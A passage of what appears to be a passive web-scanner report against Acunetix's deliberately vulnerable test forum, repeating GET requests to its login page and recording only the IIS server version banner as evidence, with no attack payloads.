class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
